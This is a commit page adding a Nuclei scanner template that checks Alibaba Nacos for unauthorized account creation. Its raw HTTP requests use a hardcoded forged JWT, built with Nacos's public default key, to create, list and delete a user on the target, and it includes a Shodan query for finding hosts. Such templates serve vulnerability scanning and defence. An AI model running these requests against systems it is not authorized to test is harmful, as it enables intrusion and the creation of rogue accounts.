Merge pull request #8106 from projectdiscovery/nacos-create-user
Create nacos-create-user.yamlpatch-1
commit
1bdd90dbb4
|
@ -0,0 +1,42 @@
|
||||||
|
id: nacos-create-user
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Alibaba Nacos - Unauthorized Account Creation
|
||||||
|
author: SleepingBag945
|
||||||
|
severity: high
|
||||||
|
description: |
|
||||||
|
Nacos uses a fixed JWT token key to authenticate users in the default configuration. Since Nacos is an open source project, the key is publicly known, so unauthorized attackers can use this fixed key to forge any user identity Log in to Nacos to manage and operate background interface functions.
|
||||||
|
reference:
|
||||||
|
- https://github.com/zan8in/afrog/blob/main/v2/pocs/afrog-pocs/vulnerability/nacos-token-create-user.yaml
|
||||||
|
metadata:
|
||||||
|
max-request: 1
|
||||||
|
verified: true
|
||||||
|
shodan-query: title:"Nacos"
|
||||||
|
tags: nacos,unauth,bypass,instrusive
|
||||||
|
|
||||||
|
http:
|
||||||
|
- raw:
|
||||||
|
- |
|
||||||
|
POST /nacos/v1/auth/users/?username={{randstr_1}}&password={{randstr_2}}&accessToken={{token}} HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
|
||||||
|
- |
|
||||||
|
GET /nacos/v1/auth/users?pageNo=1&pageSize=9&search=blur&accessToken={{token}} HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
|
||||||
|
- |
|
||||||
|
DELETE /nacos/v1/auth/users/?username={{randstr_1}}&accessToken={{token}} HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
|
||||||
|
payloads:
|
||||||
|
token:
|
||||||
|
- eyJhbGciOiJIUzI1NiJ9.eyJzdWIiOiJuYWNvcyIsImV4cCI6MTY5ODg5NDcyN30.feetKmWoPnMkAebjkNnyuKo6c21_hzTgu0dfNqbdpZQ
|
||||||
|
attack: pitchfork
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
- type: dsl
|
||||||
|
dsl:
|
||||||
|
- "status_code_1 == 200 && contains(body_1,'create user ok!')"
|
||||||
|
- "status_code_3 == 200 && contains(body_3,'delete user ok!')"
|
||||||
|
condition: and
|
Loading…
Reference in New Issue